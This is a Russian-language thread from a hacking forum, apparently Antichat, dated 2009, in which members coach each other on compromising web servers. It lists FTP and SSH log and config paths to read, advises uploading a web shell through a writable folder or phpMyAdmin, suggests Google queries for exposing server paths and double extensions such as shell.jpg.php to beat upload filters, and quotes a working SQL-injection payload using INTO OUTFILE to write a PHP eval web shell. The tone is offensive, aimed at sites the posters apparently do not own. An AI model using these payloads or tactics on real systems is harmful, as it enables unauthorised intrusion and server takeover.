09.04.2009, 22:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
http://vsftpd.beasts.org/
vsftpd:
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers
ssh:
/var/log/auth.log
Последний раз редактировалось Pashkela; 09.04.2009 в 22:24..
|
|
|
09.04.2009, 22:25
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
fker
1 Если маджик квот офф, зачем тебе конфиги? ищи папку на запись и лей шелл. Даже если ON залить можно при двойном запросе.
2 Ищи Phpmyadmin и лей через него, если база под рутом, то пасс думаю вытащишь от неё
shadow тоже не читается, что странно ведь бд запущена от рута
Это не тот рут, ничего странного 
|
|
|
|
09.04.2009, 22:34
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
именно пароли есть..
а подключение эт хорошая мысль, сейчас попробую, хотя для удаленных пользователей может быть закрыто..
Последний раз редактировалось fker; 09.04.2009 в 22:39..
|
|
|
|
09.04.2009, 22:40
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от fker
Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
гугл
warning or error site:ТВОЙ_САЙТ
если сайтов несколько, то все прочекай, частенько помогает.
|
|
|
|
09.04.2009, 22:50
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
гугл
warning or error site:ТВОЙ_САЙТ
Найс, спасибо, отличная кверь пару инклудов еще нашел))
|
|
|
|
10.04.2009, 13:54
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Как можно попробовать залить ПХП шелл если проходят файлы только с расширение gif и jpg?
И возможно ли через SQL-inj залить фаил?
Последний раз редактировалось Byrger; 10.04.2009 в 14:08..
|
|
|
|
10.04.2009, 14:43
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна запись..
https://forum.antichat.ru/thread43966.html
2.2.1 Запись в файл
Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.
Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --
Для нее работает несколько ограничений.
Запрещенно перезаписывание файлов
Требуются привилегии типа FILE
(!)Обязательны настоящие кывычки в указании имени файла
А вот что бы нам мешало сделать веб шел? Вот например так:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
|
|
|
|
10.04.2009, 14:52
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от fker
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна
.......
можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается 
|
|
|
|
10.04.2009, 15:30
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от Byrger
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
|
|
|
|
10.04.2009, 15:38
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от DrAssault
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
